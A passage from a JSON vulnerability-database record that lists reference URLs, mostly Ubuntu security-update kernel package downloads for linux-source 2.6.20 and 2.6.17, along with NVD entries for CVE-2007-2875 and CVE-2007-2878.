        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.31_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2878"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2875"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.40.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.40_all.deb"
      },
      {
        "trust": 0.1,
